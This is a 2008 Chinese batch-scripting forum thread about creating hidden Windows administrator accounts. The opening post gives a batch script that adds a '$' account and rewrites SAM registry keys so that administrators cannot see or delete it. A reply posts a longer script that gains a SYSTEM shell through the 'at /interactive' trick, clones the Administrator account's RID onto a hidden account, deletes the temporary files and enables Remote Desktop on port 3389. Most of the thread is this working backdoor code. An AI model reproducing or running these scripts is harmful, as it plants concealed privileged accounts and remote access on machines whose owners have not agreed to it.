|
wangzenggogo
初级用户
积分 69
发帖 34
注册 2008-5-29
状态 离线
|
『楼 主』:
建立隐藏账户的问题!
高手帮小弟找找问题!下面代码已经实现了在XP中建立隐藏账户,并且管理员没办法删除你的 账户,也不知道你的账户是什么,但是问题就出来了,功能实现了,可是我的电脑 属性 用户 无法显示 也不能建立用户 cmd下 net user 命令错误 !帮帮忙吧!
@echo off
net user wangzenggogo$ wangzenggogo /add
net localgroup administrators wangzenggogo$ /add
echo HKEY_LOCAL_MACHINE\SAM\SAM\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 [1] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [1] >>1.txt
regini.exe 1.txt
del 1.txt
echo Windows Registry Editor Version 5.00 > wangzenggogo$.reg
echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\wangzenggogo$] >> wangzenggogo$.reg
echo @=hex(3eb): >> wangzenggogo$.reg
echo Windows Registry Editor Version 5.00 > 3EB.reg
echo [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EB] >> 3EB.reg
echo "F"=hex:02,00,01,00,00,00,00,00,fc,52,7c,ac,8d,c1,c8,01,00,00,00,00,00,00,00,\ >> 3EB.reg
echo 00,86,2c,c2,ad,1c,33,c8,01,ff,ff,ff,ff,ff,ff,ff,7f,00,00,00,00,00,00,00,00,\ >> 3EB.reg
echo f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,0b,00,01,00,00,00,00,\ >> 3EB.reg
echo 00,00,00,00,00,00,00 >> 3EB.reg
echo "V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,1a,00,00,00,00,00,00,\ >> 3EB.reg
echo 00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,\ >> 3EB.reg
echo d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,\ >> 3EB.reg
echo 00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,\ >> 3EB.reg
echo 00,00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,\ >> 3EB.reg
echo 00,00,00,00,00,00,00,00,00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,\ >> 3EB.reg
echo 08,00,00,00,01,00,00,00,e0,00,00,00,14,00,00,00,00,00,00,00,f4,00,00,00,14,\ >> 3EB.reg
echo 00,00,00,00,00,00,00,08,01,00,00,04,00,00,00,00,00,00,00,0c,01,00,00,04,00,\ >> 3EB.reg
echo 00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\ >> 3EB.reg
echo 00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\ >> 3EB.reg
echo 00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\ >> 3EB.reg
echo 00,58,00,03,00,00,00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,\ >> 3EB.reg
echo 00,00,eb,25,79,2c,4b,2c,bc,1a,43,17,0a,32,eb,03,00,00,00,00,18,00,ff,07,0f,\ >> 3EB.reg
echo 00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,5b,03,02,00,\ >> 3EB.reg
echo 01,01,00,00,00,00,00,01,00,00,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\ >> 3EB.reg
echo 02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,77,00,61,00,6e,00,\ >> 3EB.reg
echo 67,00,7a,00,65,00,6e,00,67,00,67,00,6f,00,67,00,6f,00,24,00,00,00,01,02,00,\ >> 3EB.reg
echo 00,07,00,00,00,01,00,01,00,f3,0d,8e,33,95,cd,e9,8f,12,b7,9a,ed,98,60,17,2f,\ >> 3EB.reg
echo 01,00,01,00,36,9f,5d,12,1b,86,55,67,f1,f7,49,c8,b0,21,ef,45,01,00,01,00,01,\ >> 3EB.reg
echo 00,01,00 >> 3EB.reg
net user wangzenggogo$ /del
regedit /s wangzenggogo$.reg
del wangzenggogo$.reg
regedit /s 3EB.reg
del 3EB.reg
echo HKEY_LOCAL_MACHINE\SAM\SAM\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 [2] >>1.txt
echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5 [2] >>1.txt
regini.exe 1.txt
del 1.txt
net user wangzenggogo$ 123456
|
|
 2008-5-30 20:53 |
|
|
crazysakura
初级用户
积分 82
发帖 46
注册 2008-8-15
状态 离线
|
|
|
2008-12-5 21:52 |
|
|
a794685135
初级用户
积分 71
发帖 34
注册 2007-12-20
状态 离线
|
『第
3 楼』:
@echo off
::首先 ,获得system的shell
:3
set a1=%time:~0,4%
set b1=%time:~4,1%
if %time:~6,2% EQU 55 goto 2
::减少CPU 100% 持续时间
if %time:~6,2% leq 10 ping -n 10 127.1 >nul
if %time:~6,2% leq 20 ping -n 10 127.1 >nul
if %time:~6,2% leq 30 ping -n 10 127.1 >nul
if %time:~6,2% leq 40 ping -n 10 127.1 >nul
goto 3
:2
taskkill /f /im explorer.exe
for %%i in (0 1 2 3 4 5 6 7 8 9) do if /i %%i GTR %b1% set c=%%i & goto 1
:1
at %a1%%c% /interactive %systemroot%\explorer.exe
ping -n 30 127.1 >nul
::第一步 创建克隆账号
::设定克隆账号
set user=1234567
::设定被克隆账号
set buser=Administrator
::设定路径
set ridkey=HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\
::创建账号名为%user%$ 密码为%user%88 的隐藏账号
net user %user%$ %user%88 /add
::第二步 取出克隆账号的注册表项
::导出%user%$的rid标项
reg export %ridkey%Names\%user%$ %SystemRoot%\%user%$.reg
::取出%user%$的rid
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%\%user%$.reg') do set userrid=%%i
::导出user$的账号配置项
reg export %ridkey%00000%userrid% %SystemRoot%\%userrid%.reg
::第三步 取出被克隆账号注册表项
::导出%buser%的rid标识项
reg export %ridkey%Names\%buser% %SystemRoot%\%buser%$.reg
::导出%buser%的rid
for /f "tokens=2 delims=()" %%i in ('find /i "@=HEX" %SystemRoot%\%buser%$.reg') do set buserrid=%%i
::导出buser$的账号配置想
reg export %ridkey%00000%buserrid% %SystemRoot%\%buserrid%.reg
::第四步 替换配置
::取出克隆账号的"V"=hex:部分
for /f "skip=6 delims=()" %%o in ('find /i "," %SystemRoot%\%userrid%.reg') do @echo %%o >>%SystemRoot%\%user%-last.reg
::建立头部
@echo Windows Registry Editor Version 5.00 >%SystemRoot%\%user%-first.reg
@echo.>>%SystemRoot%\%user%-first.reg
@echo [%ridkey%00000%userrid%] >>%SystemRoot%\%user%-first.reg
::取出被克隆账号的"F"=hex:,并合并到头部
for /f "skip=2 delims=()" %%q in ('find "," %SystemRoot%\%buserrid%.reg') do @echo %%q >>%SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg001.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg001.reg') do @echo %%o >>%SystemRoot%\systemreg002.reg
del /q %SystemRoot%\systemreg001.reg
set /p a=<%SystemRoot%\systemreg002.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg002.reg') do @echo %%o >>%SystemRoot%\systemreg003.reg
del /q %SystemRoot%\systemreg002.reg
set /p a=<%SystemRoot%\systemreg003.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
for /f "skip=2 delims=()" %%o in ('find /v "%a:~4%" %SystemRoot%\systemreg003.reg') do @echo %%o >>%SystemRoot%\systemreg004.reg
del /q %SystemRoot%\systemreg003.reg
set /p a=<%SystemRoot%\systemreg004.reg
@echo %a:~0% >>%SystemRoot%\%user%-first.reg
del /q %SystemRoot%\systemreg004.reg
::将"F"=hex:以前部分好了的,与"V"=hex:部分合并
type %SystemRoot%\%user%-last.reg >>%SystemRoot%\%user%-first.reg
::第四步 删除建立的克隆账号
net user %user%$ /del
::第五步 导入修改好的克隆账号注册表项
regedit /s %SystemRoot%\%user%-first.reg
regedit /s %SystemRoot%\%user%$.reg
del /q %SystemRoot%\%user%-first.reg
del /q %SystemRoot%\%user%-last.reg
del /q %SystemRoot%\%user%$.reg
del /q %SystemRoot%\%userrid%.reg
del /q %SystemRoot%\%buser%$.reg
del /q %SystemRoot%\%buserrid%.reg
::开3389
@echo Windows Registry Editor Version 5.00>%SystemRoot%\3389.reg
@echo.>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>%SystemRoot%\3389.reg
@echo "fDenyTSConnections"=dword:00000000>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>%SystemRoot%\3389.reg
@echo "PortNumber"=dword:00000d3d>>%SystemRoot%\3389.reg 几个月前写的 , 有些地方不好
[ Last edited by a794685135 on 2008-12-5 at 22:03 ]
|
|
|
2008-12-5 22:02 |
|
|
HAT
版主
积分 9023
发帖 5017
注册 2007-5-31
状态 离线
|
『第
4 楼』:
Re 3楼
你觉得哪些地方不好?
|
 |
|
|
2008-12-5 22:37 |
|
|
